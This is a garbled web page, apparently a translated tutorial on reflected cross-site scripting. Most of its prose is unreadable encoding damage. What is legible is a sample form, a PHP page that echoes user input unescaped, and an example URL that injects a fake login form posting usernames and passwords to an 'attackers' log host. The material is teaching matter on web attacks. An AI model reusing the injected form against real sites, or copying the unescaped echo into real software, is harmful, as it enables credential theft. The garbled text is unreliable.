???????????????????????????????????????????÷??????????ù???????????????????????????????????????????????????web???????????????佨???????ι????????????????????????????????????????
????OWASP???????????????????????????????????????????????????????????????????????????????????????????????????????Щ????£?????????????????????????????????????????????????????е????
????Web??ó?????????????????????????????1??????????web??ó???????????????????Σ????????????????綯?HTML????????д????????????????α??????????????cookies????????????
?????????????XSS???????
??????OWASP??????????XSS???????????????XSS??????<script>????????????????JS???????????????????????????????????XSS???????????????????????????????????????????2???????????????
????????????????????
??????????????????
???????????????????????????????????
????????????????URL????URL??????????????????????????Щ?????
??????????????ε?????????????????????з????
?????????????????????????HTML?????????????????????????
??????????????????????????????????????
?????????PHP???????HTML????????
Form.html
<h1> INFOSEC INSTITUTE</h1>
<!-- Sends the "name" field to name.php as a GET parameter -->
<form action="name.php" method="get">
<b>Enter your name: </b>
<input type="text" name="name" />
<input type="submit" value="submit name" />
</form>
???????Ч???????

Name.php
<?php
// Reads the "name" request parameter; it is echoed below without any output encoding
$name = $_REQUEST['name'];
?>
<h1>Welcome to Infosec Institute</h1>
Hello, <?php echo $name; ?>!
How can we help you ?
???????Ч???????

??????????get???????? name??namp.php????????????????????????????????URL??
localhost/name.php?name=Bhavesh<form action="http://attackers/log.php" method="post">Username<input type="text" name="user"><br>password<input type="password" name="pass"><input type="submit"></form>

??????????????????????????????HTML?????????????????????????????????????????????????????????????log.php.